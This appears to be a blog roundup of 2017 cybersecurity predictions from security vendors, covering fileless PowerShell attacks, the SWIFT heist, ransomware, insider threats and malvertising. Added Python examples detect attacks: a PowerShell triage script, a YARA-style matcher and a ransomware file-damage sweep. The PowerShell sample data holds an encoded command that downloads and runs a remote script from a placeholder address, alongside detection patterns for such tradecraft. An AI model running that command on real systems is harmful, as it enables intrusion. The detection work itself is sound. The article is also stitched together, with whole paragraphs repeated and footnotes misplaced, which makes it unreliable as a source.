In 2016 Kaspersky Lab research discovered the extent to which companies struggle to quickly spot a security incident: 28.7% said it took them several days to discover such an event, while 19% admitted it took weeks or more. For a small but significant minority of 7.1%, it took months. Among those that struggled most, eventual discovery often came about through an external or internal security audit, or an alert from a third party, such as a client or a customer.
"For example, attacks against Border Gateway Protocol (BGP) could potentially disrupt, hijack, or disable much of the Internet. And the distributed denial of service (DDoS) attack on Dyn in October (launched by a myriad of Internet of Things [IoT] devices), took down the DNS provider and, along with it, access to part of the Internet. It was one of the largest assaults seen and those claiming responsibility said that it was just a dry run. Large-scale ISPs and enterprises can take some steps to respond, but these may well fail to prevent serious damage if individuals or states choose to exploit the Internet's deepest security flaws."
Kaspersky Lab says that ProjectSauron is also an example of a passive implant, defined as malware that presents little or no outward indication of an active infection, so it is more likely to avoid detection. Another way of avoiding detection will be malware that stays in the system for a very short time, or what Kaspersky terms an 'ephemeral infection'. “In highly sensitive environments, stealthy attackers may be satisfied to operate until a reboot wipes their infection from memory if it means avoiding all suspicion or potential operational loss from the discovery of their malware by defenders and researchers,” Raiu and Guerrero-Saade said.
Symantec experts describe similar cyber attacks as 'fileless infections', noting that malware which targets computer memory rather than files is difficult to detect. "This type of attack increased throughout 2016 and will continue to gain prominence in 2017, most likely through PowerShell attacks," the Symantec experts said.
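As an added illustration of the telemetry a defender would examine for the PowerShell-driven, memory-only activity described above (this is example code written for this page, not Symantec's or any other vendor's detection logic): the process-creation and script-block records below are constructed, the host names and the 203.0.113.9 address are invented, and the trait list and score weights are assumptions a team would tune against its own baseline. The decoder unwraps the base64 -EncodedCommand form (UTF-16LE) so the hidden payload is scored together with the launch flags rather than being missed because nothing was written to disk.

```python
import base64
import re

# Constructed sample records, modelled on Windows process-creation (4688) and
# PowerShell script-block logging (4104) events. Hosts, IDs and the 203.0.113.9
# address are invented for the example; this is not real telemetry.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.9/a.ps1')"
SAMPLE_EVENTS = [
    {"id": 1, "host": "ws01", "event": 4688,
     "cmdline": "powershell.exe -NoP -W Hidden -Enc "
                + base64.b64encode(PAYLOAD.encode("utf-16-le")).decode("ascii")},
    {"id": 2, "host": "ws02", "event": 4104,
     "script": "Get-ChildItem C:\\Logs | Where-Object { $_.Length -gt 1MB }"},
    {"id": 3, "host": "ws03", "event": 4104,
     "script": "$asm = [System.Reflection.Assembly]::Load($bytes); "
               "$asm.EntryPoint.Invoke($null, $null)"},
]

# (regex, description, weight): traits of memory-only PowerShell tradecraft.
# Weights are an assumption for the example, not a vendor scoring scheme.
TRAITS = [
    (r"\bIEX\b|Invoke-Expression", "inline expression evaluation", 1),
    (r"DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest", "remote payload fetch", 2),
    (r"Reflection\.Assembly\]::Load|VirtualAlloc|Marshal\]::Copy", "in-memory code loading", 3),
    (r"-W(?:indowStyle)?\s+Hidden|-NoP(?:rofile)?\b|-NonI(?:nteractive)?\b", "stealth launch flags", 1),
]
ENCODED_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(cmdline):
    """Return the plaintext of a -EncodedCommand argument (base64 of UTF-16LE), or None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse(event):
    """Score one event; a decoded command is inspected together with its launch line."""
    text = event.get("script") or event.get("cmdline", "")
    reasons, score = [], 0
    decoded = decode_encoded_command(text) if "cmdline" in event else None
    if decoded:
        reasons.append("base64 -EncodedCommand")
        score += 1
        text = text + "\n" + decoded
    for pattern, why, weight in TRAITS:
        if re.search(pattern, text, re.I):
            reasons.append(why)
            score += weight
    return {"id": event["id"], "host": event["host"], "score": score,
            "reasons": reasons, "decoded": decoded}


def triage(events, threshold=3):
    """Events scoring at or above the threshold, highest score first."""
    hits = [r for r in (analyse(e) for e in events) if r["score"] >= threshold]
    return sorted(hits, key=lambda r: r["score"], reverse=True)


if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(f"host={hit['host']} event={hit['id']} score={hit['score']} "
              f"reasons={', '.join(hit['reasons'])}")
        if hit["decoded"]:
            print("  decoded:", hit["decoded"])
```

Run against the constructed records, the encoded downloader on ws01 and the reflective loader on ws03 surface, while the routine file listing on ws02 scores zero. The same logic applies unchanged to real 4104 script-block text, which is why enabling script-block logging is the prerequisite for catching this class of attack at all.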
Hackers will be trying other ways to profit. In 2016, the SWIFT heist in Bangladesh made headlines around the world, not only for the large sums of money lost, but because it was a new type of security breach.
“The SWIFT attack was a proof of concept for criminals, and as a result institutional payments will be a growing attack vector through combined cyber and fraud attacks. Traditionally, the retail payments channels have been pretty well-protected with detection tools, but the SWIFT heist illustrated that all payment types, including those used by corporates and internationals, are at risk, including wholesale, corporate and institutional banking channels.
"The modus operandi could be the insider, malware, social engineering, hijacked email instruction, man-in-the-browser* or identity theft. Luckily, banks are switching on to this shift and moving from solely financial crime intelligence units to include information security, and are hiring people to look after cyber risk in corporate institutional divisions,” said Boye Vanell, Regional Director Asia, BAE Systems Applied Intelligence.
Kaspersky Lab also predicts the rise of SWIFT-heist middlemen. “Performing one of these heists requires initial access, specialised software, patience, and, eventually, a money laundering scheme. Each of these steps has a place for already-established criminals to provide their services at a fee, with the missing piece being the specialised malware for performing SWIFT attacks. We expect to see the commodification of these attacks through specialised resources being offered for sale in underground forums or through as-a-service schemes,” said the GReAT team.
Financial infrastructure is at greater risk of attack, Sophos' Jakobsen adds. “The use of targeted phishing and 'whaling' (editor's note: the targeting of a senior person in order to get privileged access to important data) continues to grow. These attacks use detailed information about company executives to trick employees into paying fraudsters or compromising accounts. We also expect more attacks on critical financial infrastructure, such as the attack involving SWIFT-connected institutions which cost the Bangladesh Central Bank US$81 million in February. SWIFT recently admitted that there have been other such attacks and it expects to see more, stating in a leaked letter to client banks: 'The threat is very persistent, adaptive and sophisticated – and it is here to stay'.”
"The digital footprint of both businesses and individuals has expanded dramatically, increasing the potential attack surface. Additionally, everything has become a target and anything can be a weapon. Threats are becoming more intelligent, operate autonomously, and are increasingly difficult to detect. Lastly, old threats keep returning, but enhanced with new technologies that push the boundaries of detection and forensic investigation," summarised the FortiGuard Labs threat research team. FortiGuard Labs is Fortinet's cyber security intelligence arm. "In (2017) we expect to see malware designed (to be) “human-like” with adaptive, success-based learning to improve the impact and efficacy of attacks."
Even in a world where every security flaw can become critical, some flaws will be more critical than others. Security specialists have flagged the following as some of the key concerns for cyber security this year:
Advertising, malvertising
Sophos agreed with Kaspersky Lab on the growth of malvertising and corruption of online advertising ecosystems. “Malvertising, which spreads malware through online ad networks and web pages, has been around for years. But in 2016, we saw much more of it. These attacks highlight larger problems throughout the advertising ecosystem, such as click fraud, which generates paying clicks that don't correspond to real customer interest. Malvertising has actually generated click fraud, compromising users and stealing from advertisers at the same time," Jakobsen said.
What next?
With the threat landscape expanding and evolving, what is clear is that more investment will be poured into cyber defence, both at the user and the vendor level. Hillstone Networks' Liu said, "In 2016, more investment was placed on post-breach detection, incident response and data-centric security. This trend will continue into 2017. Technological developments in the areas of breach detection, data leak protection and remediation will focus on the full cyber kill chain rather than an isolated attack."
Business concerns with cybersecurity will see many organisations in Southeast Asia moving to security subscription services and engaging closely with providers to protect their networks, adds Tan Kit Yong, Regional Director, Southeast Asia, CenturyLink. "Businesses will need technology standardisation, automation and a data-centric approach to information and network security," he added.
“To change the rules of the game between attackers and defenders, we need to neutralise our adversaries’ greatest advantages,” said Vincent Weafer, VP of Intel Security’s McAfee Labs. “As a new defensive technique is developed, its effectiveness increases until attackers are compelled to develop countermeasures to evade it. To overcome the designs of our adversaries, we need to go beyond understanding the threat landscape to changing the defender-attacker dynamics in six key areas: information asymmetry, making attacks more expensive, improving visibility, better identifying exploitation of legitimacy, improving protection for decentralised data, and detecting and protecting in agentless environments.”
“Threats come in various forms, including ransomware, firmware attacks, attacks on IoT devices, social engineering attacks and more. Cybercrime will continue to evolve in Asia, and cybersecurity professionals need to evolve correspondingly to ensure our enemies do not get the upper hand. The cyberthreat paradigm needs to be altered to focus on defender-attacker dynamics. Only then can cybersecurity practitioners break the cycle of cyber criminals circumventing new cyber defence tactics,” added David Allott, Director of Cyber Defence, Intel Security.
More accountability
BAE's Vanell predicts that the way government and enterprises view security could evolve. "We predict 2017 will see the end of the age of innocence for senior business leaders and boards faced with cyber attacks; we will see more executives being held accountable for not having the right security measures in place. No longer can any Internet-connected system be expected to be 100% secure, and no longer can businesses survive without proper investment in cyber defence. However, companies will also realise they needn’t view security and privacy as a compliance burden, but as an opportunity to win the trust of their customers and differentiate themselves in the market,” Vanell said.
Derek Manky, Global Security Strategist, Fortinet concurred. “The expanding attack surface enabled by technology innovations such as cloud computing and IoT devices, a global shortage of cybersecurity talent, and regulatory pressures continue to be significant drivers of cyber threats. The pace of these changes is unprecedented, resulting in a critical tipping point as the impact of cyber attacks is felt well beyond their intended victims in personal, political, and business consequences. Going forward, the need for accountability at multiple levels is urgent and real, affecting vendors, governments, and consumers alike. Without swift action, there is a real risk of disrupting the progress of the global digital economy,” he said.
BAE also calls for the private and public sectors to work together towards a measurement standard for cyber hygiene. "Just as we have agreed measurement standards for the health of the economy or vital services like education, we predict 2017 will see cyber hygiene measured in a standardised way for the first time, to remind businesses and nations of their responsibilities for personal data. What that measurement looks like is a question industry, government and the wider business community must work out together," he said.
What cognitive computing can do for cybersecurity
Vendors will increasingly incorporate machine learning and artificial intelligence (AI) into security solutions as the technologies come of age.
“Machine learning is poised to be a crucial element in battling known and unknown ransomware threats and exploit kit attacks, among others,” Trend Micro's Siah predicted. “Machine learning is deployed through a layered system with human- and computer-provided inputs running through mathematical algorithms. This model is then pitted against network traffic, allowing a machine to make quick and accurate decisions about whether the network content—files and behaviours—are malicious or not.”
Jun Shi, VP, Sales Engineering and CTO (APAC), Juniper Networks said that the benefits are clear. “While organisations today invest heavily in effective security hardware and software, they often lack the security specialists necessary to ensure their effectiveness. With AI embedded in security systems, security personnel will have access to increased resources to better enforce a consistent security policy, as they are relieved from manually sieving through a sea of alerts to find the truly malicious ones,” he said.
"There will be a significant increase in AI investments in 2017 compared to 2016. AI will provide business users access to powerful insights and will drive faster business decisions in marketing, e-commerce, product management and other areas of the business by helping close the gap from insights to action. Application of AI in security is expected to gain momentum as the next logical step, underpinning systems that can identify, analyse, learn, anticipate and adjust to cybersecurity threats," agreed Naveen Bhat, MD, Ixia, Asia Pacific.
But Aurora of Darktrace points out it will work both ways, with AI also being used by attackers to “wield highly sophisticated and persistent attacks that blend into the noise of busy networks”. “We have already seen the first glimpses of these types of attack. Polymorphic malware, which changes its attributes mid-attack to evade detection, has reinforced the obsolescence of signature-based detection methods. What is emerging is a next generation of attacks that use AI-powered, customised code to emulate the behaviours of specific users so accurately as to fool even skilled security personnel,” he said.
“In 2017, we can expect AI to be applied to all stages of a cyber-attacker’s mission. This includes the ability to craft sophisticated and bespoke phishing campaigns that will successfully dupe even the most threat-conscious employee. (2017's) attacker can see more than your social media profile – they know that your 10am meeting with your supplier is being held at their new headquarters. At 9:15am, as you get off the train, an email with the subject line Directions to Our Office arrives in your inbox, apparently from the person that you are meeting. Now, do you click the map link in that email?”
Interested?
Read the related TechTrade Asia blog posts on IoT security in 2017 and on the problem of data integrity
Kaspersky Lab named ransomware its security story of the year for 2016 is a related blog post, as is McAfee Labs' 2017 threat predictions
Read the TechTrade Asia blog post about security becoming an availability issue for data centres
Check out the TechTrade Asia blog posts about the APJ findings for the CA Technologies security survey and ESET's report of a Linux ransomware scam
*Man-in-the-browser: data travels through different networks, hardware and software to get to a destination. A man-in-the-browser is malware that hooks into the browser software itself, so that it can read or alter data (such as payment details) after the user has entered it and before it is sent, without the user or the receiving site noticing.
^YARA is a rule language for describing malware families by the text strings, byte patterns and other traits they contain; it has been found particularly useful for building detection tools.
Costin Raiu, Director of the Global Research and Analysis Team (GReAT) at Kaspersky Lab, and Juan Andrés Guerrero-Saade, Senior Security Researcher, Kaspersky Lab GReAT, say in their 2017 predictions that indicators of compromise (IoCs) – signs that point to an infection being present – are useful for sharing the traits of already known malware, but not for malware that is as yet undetected.
The Kaspersky Lab authors point to the ProjectSauron APT, for example, a malware platform which is tailored for each victim to such a degree that the indicators from one infection cannot be used to detect another. “That is not to say that defenders are entirely without recourse but it’s time to push for the wider adoption of good Yara rules^ that allow us to both scan far-and-wide across an enterprise, inspect and identify traits in binaries at rest, and scan memory for fragments of known attacks,” Raiu and Guerrero-Saade said.
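To make concrete what scanning for traits rather than exact indicators looks like, here is an added example (not Kaspersky Lab's code, and not a real ProjectSauron signature): a small YARA-style matcher in Python that compiles hex patterns with ?? wildcards and [n-m] jumps, plus plain strings, and applies one rule both to a buffer standing in for a binary at rest and to regions standing in for a process memory dump. Every byte sequence, the rule name loader_traits and the string names are invented for the example; the equivalent YARA rule is given in the comment so the same idea can be carried over to real yara tooling. The point is that the code fragment is found in both copies even though its immediates differ between the file and the in-memory image, which is what an exact-hash IoC would miss.

```python
import re

# Constructed buffers standing in for a binary on disk and a dumped memory region.
# Every byte sequence and name here is invented for the example.
PROLOGUE = b"\x55\x8b\xec\x83\xec\x10\xe8\x00\x00\x00\x00\x5b"  # push ebp; mov ebp,esp; sub esp,N; call; pop ebx
FILE_AT_REST = b"MZ\x90\x00" + b"\x00" * 64 + PROLOGUE + b"SauronConfig:" + b"\x00" * 8 + b"Mutex_abc"
MEMORY_REGION = (0x00400000, b"\x00" * 100
                 + b"\x55\x8b\xec\x83\xec\x40\xe8\x11\x22\x33\x44\x5b"  # same code, different immediates
                 + b"cmd.exe /c " + b"\x00" * 20 + b"Mutex_abc")
CLEAN_REGION = (0x7ff00000, b"\x00" * 50 + b"hello world" + b"\x00" * 50)

# Equivalent YARA rule (rule name and strings invented for this example):
#   rule loader_traits {
#     strings:
#       $prologue = { 55 8B EC 83 EC ?? E8 ?? ?? ?? ?? 5B }
#       $mutex    = "Mutex_abc"
#       $cfg      = "SauronConfig:"
#     condition:
#       $prologue and ($mutex or $cfg)
#   }
RULE = {
    "name": "loader_traits",
    "strings": {
        "$prologue": ("hex", "55 8B EC 83 EC ?? E8 ?? ?? ?? ?? 5B"),
        "$mutex": ("text", "Mutex_abc"),
        "$cfg": ("text", "SauronConfig:"),
    },
    "condition": lambda m: m["$prologue"] and (m["$mutex"] or m["$cfg"]),
}

JUMP_RE = re.compile(r"^\[(\d+)-(\d+)\]$")


def hex_pattern(spec):
    """Compile a YARA-style hex string (?? wildcards, [n-m] jumps) into a bytes regex."""
    out = b""
    for tok in spec.split():
        jump = JUMP_RE.match(tok)
        if tok == "??":
            out += b"."
        elif jump:
            out += b".{%d,%d}" % (int(jump.group(1)), int(jump.group(2)))
        else:
            out += re.escape(bytes([int(tok, 16)]))
    return re.compile(out, re.DOTALL)


def compile_rule(rule):
    """Turn every string in the rule into a compiled bytes regex."""
    compiled = {}
    for ident, (kind, spec) in rule["strings"].items():
        compiled[ident] = hex_pattern(spec) if kind == "hex" else re.compile(re.escape(spec.encode()))
    return compiled


def scan(buffer, rule, base=0):
    """Return (matched, {ident: [addresses]}) for one buffer; base turns offsets into addresses."""
    patterns = compile_rule(rule)
    offsets = {ident: [base + m.start() for m in pat.finditer(buffer)]
               for ident, pat in patterns.items()}
    return rule["condition"]({k: bool(v) for k, v in offsets.items()}), offsets


def scan_memory(regions, rule):
    """Scan a list of (base_address, bytes) regions as a memory dump; return the hits."""
    hits = []
    for base, data in regions:
        matched, offsets = scan(data, rule, base)
        if matched:
            hits.append({"base": base, "offsets": {k: v for k, v in offsets.items() if v}})
    return hits


if __name__ == "__main__":
    print("file at rest:", scan(FILE_AT_REST, RULE))
    for hit in scan_memory([MEMORY_REGION, CLEAN_REGION], RULE):
        print(f"memory region at {hit['base']:#010x}:",
              {k: [hex(a) for a in v] for k, v in hit["offsets"].items()})
```

The matcher is deliberately minimal (no string modifiers, no counting operators), but it shows the essential property of a good rule: the wildcarded bytes absorb the per-victim variation that a hash or a fixed byte sequence would trip over, while the condition still demands more than one trait before it fires.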
Even in a world where every security flaw can become critical, some flaws will be more critical than others. Security specialists have flagged the following as some of the key concerns for cyber security this year:
Securing the mobile world
As more users spend more time on their mobile devices, this will be where hackers strike next. "The mobile space will be increasingly attractive to hackers. (Mobile platforms) will surely benefit from decreased attention and the difficulty of attaining forensic tools for the latest mobile operating systems," said Raiu and Guerrero-Saade of Kaspersky Lab.
"Most mobile payment systems require linking a personal bank account or credit card for direct charges. The level of security of mobile devices is still not on par with that of computers, and they are easier to hack, making breaches harder to detect. Compromised mobile terminals may leak confidential information on these accounts or allow unauthorised charges to these accounts. Financial institutions also rely on limiting transaction sizes and employing fraud detection tools for security purposes. Over time, we will see hackers coming up with more sophisticated ways to defraud the system," said Tim Liu, CTO, Hillstone Networks.
“In an increasingly mobile workforce, identity and access management (IAM) will be one area in security to watch out for in 2017. In fact, 85% of Asia Pacific & Japan (APJ) respondents in our recent global survey said that identity-centric security is critical to their business, whether for physical premises or mobile applications. To step up their game and stay secure, businesses must go beyond the basics of password management and single sign-on, and implement strong step-up authentication focusing on privileged identities and access,” said Stephen Miles, CTO, Asia Pacific and Japan, CA Technologies.
Ransomware
Expect more ransomware attempts. "We expect to see very focused attacks against high-profile targets, such as celebrities, political figures, and large organisations. Automated attacks will introduce an economy of scale to ransomware that will allow hackers to cost-effectively extort small amounts of money from large numbers of victims simultaneously, especially by targeting IoT devices," said FortiGuard Labs researchers.
Ransomware will evolve. “As more users recognise the risks of ransomware attack via email, criminals are exploring other vectors. Some are experimenting with malware that reinfects later, long after a ransom is paid, and some are starting to use built-in tools and no executable malware at all to avoid detection by endpoint protection code that focuses on executable files,” said Jakobsen of Sophos.
"Recent examples (are the offer) to decrypt files after the victim shared the ransomware with two friends, and those friends paid to decrypt their files. Ransomware authors are also starting to use techniques other than encryption, for example deleting or corrupting file headers. And finally, with 'old' ransomware still floating around the web, users may fall victim to attacks that can't be 'cured' because payment locations no longer work.”
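The 'corrupting file headers' and encrypt-in-place behaviours mentioned above are exactly what a post-infection triage script looks for when deciding which files are worth a recovery attempt. The following is an added example (not Sophos' or any vendor's code) of two cheap heuristics: whether a file still begins with the magic bytes its extension implies, and whether its first 4 KiB has the near-8-bits-per-byte entropy of ciphertext. The magic table, the 7.5-bit threshold and the sample 'files' are all constructed for the example; the pseudo_random helper stands in for encrypted content so the script runs offline and deterministically.

```python
import hashlib
import math

# Known file signatures ("magic bytes"); a deliberately small table for the example.
MAGIC = {
    ".pdf": b"%PDF-",
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".docx": b"PK\x03\x04",
    ".zip": b"PK\x03\x04",
}
ENTROPY_THRESHOLD = 7.5  # bits per byte; random-looking data sits near 8.0 (assumed cutoff)


def shannon_entropy(data):
    """Bits of entropy per byte over the given data (0.0 for empty input)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def header_status(name, data):
    """Compare the file's leading bytes with the signature its extension implies."""
    ext = name[name.rfind("."):].lower() if "." in name else ""
    expected = MAGIC.get(ext)
    if expected is None:
        return "unknown-type"
    if data.startswith(expected):
        return "intact"
    if data[:len(expected)] == b"\x00" * len(expected):
        return "header-zeroed"
    return "header-mismatch"


def assess(name, data):
    """Classify one file from its header and the entropy of its first 4 KiB."""
    ent = shannon_entropy(data[:4096])
    hdr = header_status(name, data)
    if hdr in ("header-zeroed", "header-mismatch"):
        # Wrong header plus ciphertext-like body: encrypted in place.
        # Wrong header plus ordinary body: header deleted or overwritten, body may be salvageable.
        verdict = "likely-encrypted" if ent > ENTROPY_THRESHOLD else "header-corrupted"
    elif hdr == "unknown-type" and ent > ENTROPY_THRESHOLD:
        verdict = "suspicious-high-entropy"
    else:
        verdict = "ok"
    return {"name": name, "header": hdr, "entropy": round(ent, 2), "verdict": verdict}


def sweep(files):
    """Assess every (name, bytes) pair; return only those needing attention."""
    return [r for r in (assess(n, d) for n, d in files.items()) if r["verdict"] != "ok"]


def pseudo_random(n, seed=b"example"):
    """Deterministic high-entropy bytes (stand-in for ciphertext), built by chaining SHA-256."""
    out, block = b"", seed
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out += block
    return out[:n]


# Constructed sample "files": names and contents are invented for the example.
SAMPLE_FILES = {
    "report.pdf": b"%PDF-1.4\n" + b"Quarterly figures, see table 3.\n" * 120,
    "photo.jpg": pseudo_random(4096),                                        # encrypted in place
    "budget.docx": b"\x00" * 64 + b"PK\x03\x04" + b"word/document.xml" * 60,  # header wiped, body left
    "notes.txt": b"Call supplier about invoice 1042.\n" * 100,
}

if __name__ == "__main__":
    for r in sweep(SAMPLE_FILES):
        print(f"{r['name']}: {r['verdict']} (header={r['header']}, entropy={r['entropy']})")
```

Entropy is only consulted once the header is wrong because compressed formats (docx, zip, png, jpg) are legitimately close to 8 bits per byte; on its own it would flag every photo on the disk. The distinction between the two non-ok verdicts matters for response: a header-corrupted file may be repairable from format knowledge and backups of its siblings, whereas a likely-encrypted one is only recoverable from backup.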
While many security vendors have warned that there is no guarantee that paying a ransom will get files back, so far most victims who paid have in fact had their files returned. In 2017, Kaspersky Lab says, there will be a crisis of confidence. “Cybercriminals have exhibited a surprising semblance of professionalism in fulfilling (the ransomware) promise and this has allowed the ecosystem to thrive. However, as the popularity continues to rise and a lesser grade of criminal decides to enter the space, we are likely to encounter more and more ‘ransomware’ that lacks the quality assurance or general coding capability to actually uphold this promise,” they said.
“We expect ‘skiddie’ (editor's note: script kiddie) ransomware to lock away files or system access or simply delete the files, trick the victim into paying the ransom, and provide nothing in return.”
SolarWinds also sees that an increase in data breaches will force organisations to weigh the implications of potential data loss against the expense of hiring security experts. “In many cases, businesses in 2017 will choose to take a calculated risk about what they can 'afford to lose' rather than what it costs to prevent data loss entirely. This response will be especially true in the case of ransomware attacks, when it is nearly impossible to guarantee that hackers will not leak or reveal stolen data, even after receiving the 'ransom' payment,” said Leon Adato, Head Geek and Technical Evangelist at SolarWinds.
Jeffrey Kok, Senior Director of Presales, Asia Pacific and Japan, CyberArk, also believes in not paying ransoms. "Paying a ransom only emboldens cyber criminals, and does not guarantee that you will get your data back," he agreed. "Most anti-malware and anti-ransomware solutions today focus on detecting and blocking malware at the point of inception. These solutions can be helpful when you know what you’re looking for – but when it comes to ransomware, there are new variants coming out every day," he said.
"Standard ransomware just infects user machines; this is the same ransomware that would infect a regular consumer at home. These attacks will be opportunistic and less damaging to organisations. Advanced ransomware is far more dangerous. These ransomware attacks follow the same general attack pattern as targeted network attacks, but for a very different end goal. Instead of information theft, ransomware attackers seek to cause widespread havoc through mass infection and encryption of user data."
Kok recommends backups, combined with privileged access management and application control, to stem advanced ransomware attacks. Implementing 'least-privileged' access (granting only as much access as a task requires) and removing local administrator rights from regular PCs reduces the likelihood of attackers getting their hands on sensitive files, since malware running as an ordinary user cannot reach what that user cannot. 'Grey listing' apps restricts the execution of apps that could turn out to be ransomware until their trustworthiness can be determined; white-listed apps are those already trusted to run, while black-listed apps are blocked outright.
David Siah, Country Manager, Singapore, Trend Micro said, “In 2017, ransomware will remain a top threat. Its operations will become fuller, as more variants are produced; deeper, as well-planned targeted attacks are launched; and wider, as threats affect non-desktop targets like mobile and smart devices.
“From January to September 2016, we saw a staggering 400% spike in the number of ransomware families. We predict a 25% growth in the number of new ransomware families in 2017, translating to an average of 15 new families discovered each month. Although the tipping point has passed in 2016, a period of stabilisation will push competing cybercriminals to diversify, hitting more potential victims, platforms, and bigger targets.
“Mobile ransomware will likely follow the same trajectory as desktop ransomware given how the mobile user base is now a viable, untapped target. Non-desktop computing terminals like point-of-sale (PoS) systems or ATMs may also suffer extortion-type attacks.”
Shadow IT
Shadow IT, the phenomenon of employees using their own devices, managing their own apps and data, and using their own personal collaboration tools to do their jobs, continues to rise because enterprise IT is unable to compete with the features, ease of use and reliability of consumer services, says Adam Judd, VP, Asia Pacific Japan, Brocade.
"While some organisations will attempt to legislate security via corporate policy, in 2017 the most enlightened companies will recognise the implicit threat of sub-par IT services. The most successful IT and info-sec teams will collaborate on simultaneously modernising and securing their infrastructure with software-defined networking (SDN), orchestrated network function virtualisation (NFV) security services, advanced encryption and identity management, integration of cloud services, and compartmentalisation of local apps," he said.
The role of the insider
Insiders are often the source of the most dangerous attacks, says Sanjay Aurora, MD, Asia Pacific, Darktrace. "They are harder to detect, because they use legitimate user credentials. They can do maximum damage, because they have knowledge of and privileged access to information required for their jobs, and can hop between network segments. A disgruntled employee looking to do damage stands a good chance through a cyber attack," he said.
Non-malicious insiders are just as much of a vulnerability, Aurora adds. "How many times have links been clicked before checking email addresses? Or security policy contravened to get a job done quicker, such as uploading confidential documents on less secure public file hosting services? We can no longer reasonably expect 100% of employees and network users to be impervious to cyber-threats that are getting more advanced – they won’t make the right decision, every time.”
Due to the increasing sophistication of external hackers, organisations are going to have a harder time distinguishing between insiders and external attackers who have hijacked legitimate user credentials, Aurora warned. “Organisations need to combat this insider threat by gaining visibility into their internal systems, rather than trying to reinforce their network perimeter. We don’t expect our skin to protect us from viruses – so we shouldn’t expect a firewall to stop advanced cyber-threats which, in many cases, originate from the inside in the first place."
Sophos has also noticed how hackers have become more effective at targeting insiders. "Cybercriminals are getting better at exploiting the ultimate vulnerability - humans. Ever more sophisticated and convincing targeted attacks seek to coax users into compromising themselves,” Jakobsen of Sophos warned. “For example, it’s common to see an email that addresses the recipient by name and claims they have an outstanding debt the sender has been authorised to collect. Shock, awe or borrowing authority by pretending to be law enforcement are common and effective tactics. The email directs them to a malicious link that users are panicked into clicking on, opening them up to attack. Such phishing attacks can no longer be recognised by obvious mistakes.”
Source: Darktrace. Aurora.
Working on a defence is important, nevertheless. Trend Micro's Siah stressed that training employees should move from simply being aware of threats to actually acknowledging and collectively working to protect against them, for example by adding more checks and balances for potentially suspicious behaviour. “Educating employees in areas such as social engineering techniques and keeping them up-to-date on the latest business email compromise (BEC) scams is crucial to establishing improved cybersecurity habits and living a safer digital life," he said.
"Implement stringent policies for normal and out-of-the-ordinary transactions, which include layers of verification and thresholds for large sums requiring more validation, before executing transfers,” Siah added.
Skilled cybersecurity professionals are sorely needed for proper cybersecurity, FortiGuard Labs stressed. "The current shortage of skilled cybersecurity professionals means that many organisations or countries looking to participate in the digital economy globally will do so at great risk. They simply do not have the experience or training necessary to develop a security policy, protect critical assets that now move freely between network environments, or identify and respond to today’s more sophisticated attacks," said FortiGuard Lab researchers.
Advertising, malvertising
Another 2017 prediction from Kaspersky Lab involves the use of advertising networks as malware. “Their placement is already entirely financially motivated and there is little or no regulation, as evidenced by recurring malvertising attacks on major sites. By their very nature, ad networks provide excellent target profiling through a combination of IPs (editor's note: IP addresses), browser fingerprinting, and browsing interest and login selectivity. This kind of user data allows a discriminate attacker to selectively inject or redirect specific victims to their payloads and thus largely avoid collateral infections and the persistent availability of payloads that tend to pique the interest of security researchers. As such, we expect the most advanced cyberespionage actors to find the creation or co-opting of an ad network to be a small investment for sizeable operational returns, hitting their targets while protecting their latest toolkits,” they said.
Sophos agreed with Kaspersky Lab on the growth of malvertising and corruption of online advertising ecosystems. “Malvertising, which spreads malware through online ad networks and web pages, has been around for years. But in 2016, we saw much more of it. These attacks highlight larger problems throughout the advertising ecosystem, such as click fraud, which generates paying clicks that don't correspond to real customer interest. Malvertising has actually generated click fraud, compromising users and stealing from advertisers at the same time," Jakobsen said.
What next?
Source: Hillstone Networks. Liu.
Business concerns with cybersecurity will see many organisations in Southeast Asia moving to security subscription services and engaging closely with providers to protect their network, adds Tan Kit Yong, Regional Director, Southeast Asia, CenturyLink. "Businesses will need technology standardisation, automation and a data-centric approach to information and network security," he added.
“To change the rules of the game between attackers and defenders, we need to neutralise our adversaries’ greatest advantages,” said Vincent Weafer, VP of Intel Security’s McAfee Labs. “As a new defensive technique is developed, its effectiveness increases until attackers are compelled to develop countermeasures to evade it. To overcome the designs of our adversaries, we need to go beyond understanding the threat landscape to changing the defender-attacker dynamics in six key areas: information asymmetry, making attacks more expensive, improving visibility, better identifying exploitation of legitimacy, improving protection for decentralised data, and detecting and protecting in agentless environments.”
“Threats come in various forms, including ransomware, firmware attacks, attacks on IoT devices, social engineering attacks and more. Cybercrime will continue to evolve in Asia, and cybersecurity professionals need to evolve correspondingly to ensure our enemies do not get the upper hand. The cyberthreat paradigm needs to be altered to focus on defender-attacker dynamics. Only then can cybersecurity practitioners break the cycle of cyber criminals circumventing new cyber defence tactics,” added David Allott, Director of Cyber Defence, Intel Security.
Source: CenturyLink. Tan.
BAE's Vanell predicts that the way government and enterprises view security could evolve. "We predict 2017 will see the end of the age of innocence for senior business leaders and boards faced with cyber attacks; we will see more executives being held accountable for not implementing the right security measures in place. No longer can any Internet-connected system be expected to be 100% secure, and no longer can businesses survive without proper investment in cyber defence. However, companies will also realise they needn’t view security and privacy as a compliance burden, but as an opportunity to win the trust of their customers and differentiate themselves in the market,” Vanell said.
Derek Manky, Global Security Strategist, Fortinet concurred. “The expanding attack surface enabled by technology innovations such as cloud computing and IoT devices, a global shortage of cybersecurity talent, and regulatory pressures continue to be significant drivers of cyber threats. The pace of these changes is unprecedented, resulting in a critical tipping point as the impact of cyber attacks is felt well beyond their intended victims in personal, political, and business consequences. Going forward, the need for accountability at multiple levels is urgent and real, affecting vendors, governments, and consumers alike. Without swift action, there is a real risk of disrupting the progress of the global digital economy,” he said.
